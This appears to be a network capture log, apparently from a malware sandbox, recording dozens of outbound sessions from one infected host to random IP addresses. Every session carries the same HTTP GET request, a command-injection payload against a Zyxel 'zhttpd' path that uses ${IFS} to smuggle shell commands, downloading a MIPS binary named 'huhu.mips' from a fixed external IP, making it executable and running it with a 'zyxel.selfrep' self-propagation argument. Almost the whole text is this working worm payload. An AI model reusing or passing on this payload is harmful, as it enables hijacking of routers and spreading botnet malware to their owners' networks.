                                      Jan 19, 2024 17:29:44.015259027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7338192.168.2.1433220185.201.239.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015296936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7339192.168.2.1444966168.139.79.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015330076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7340192.168.2.145443691.81.58.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015372992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7341192.168.2.145995262.137.46.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015418053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7342192.168.2.143457684.5.180.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015454054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7343192.168.2.1446158124.68.238.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015500069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7344192.168.2.1448024212.183.226.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015533924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7345192.168.2.143477674.76.98.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015559912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7346192.168.2.145641657.23.57.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015625954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7347192.168.2.1436632110.82.88.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015661955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7348192.168.2.1449274133.165.49.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015693903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7349192.168.2.1445132146.229.239.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.015731096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7350192.168.2.1460022159.46.106.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022358894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7351192.168.2.1448658198.51.20.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022416115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7352192.168.2.1454552175.39.176.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022442102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7353192.168.2.1456428139.162.179.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022505999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7354192.168.2.1447952104.85.114.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022542000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7355192.168.2.144272446.225.195.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022588015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7356192.168.2.145524090.121.112.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022639036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7357192.168.2.143855420.81.89.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022670984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7358192.168.2.1445934186.26.13.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022716999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7359192.168.2.1447810151.216.66.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022748947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7360192.168.2.145901643.217.199.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022793055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7361192.168.2.143568049.38.22.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022825003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7362192.168.2.1438832178.140.253.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022859097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7363192.168.2.1454040143.200.54.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022902966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7364192.168.2.1455866141.80.223.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022936106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7365192.168.2.1451428212.18.95.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.022989988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7366192.168.2.1455010169.61.193.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023030996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7367192.168.2.1434442175.85.25.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023061991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7368192.168.2.1440172210.188.89.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023108959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7369192.168.2.1448260190.14.17.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023123026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7370192.168.2.1448744111.173.31.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023169994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7371192.168.2.1452062187.48.85.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023202896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7372192.168.2.14404368.96.121.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023251057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7373192.168.2.1442642147.93.186.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023281097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7374192.168.2.1452948169.3.146.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023309946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7375192.168.2.1445038131.15.100.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023351908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7376192.168.2.144113050.31.223.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023370981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7377192.168.2.144598420.233.179.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023412943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7378192.168.2.1453324190.53.133.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023480892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7379192.168.2.1434988153.216.32.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023511887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7380192.168.2.1441200212.62.240.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023538113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7381192.168.2.143568220.162.215.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023569107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7382192.168.2.144776042.155.21.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023595095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7383192.168.2.145256870.219.203.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023622036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7384192.168.2.143932440.176.76.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023678064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7385192.168.2.1437440134.1.249.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023705006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7386192.168.2.1440838204.240.22.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023750067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7387192.168.2.1445520186.129.1.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023778915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7388192.168.2.145046665.190.48.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023824930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7389192.168.2.1459562220.66.12.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023865938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7390192.168.2.1434018161.37.197.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023922920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7391192.168.2.1437562208.39.119.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.023961067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7392192.168.2.145523474.159.66.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024004936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7393192.168.2.144395277.72.202.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024029970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7394192.168.2.144954670.133.38.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024065971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7395192.168.2.1454630186.184.107.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024106979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7396192.168.2.1452276172.68.166.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024156094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7397192.168.2.1446966159.106.251.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024185896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7398192.168.2.1439950175.199.232.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024328947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7399192.168.2.1443772205.209.118.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024357080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7400192.168.2.1459498199.73.211.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024409056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7401192.168.2.145274299.33.25.18443
                                      TimestampBytes transferredDirectionData
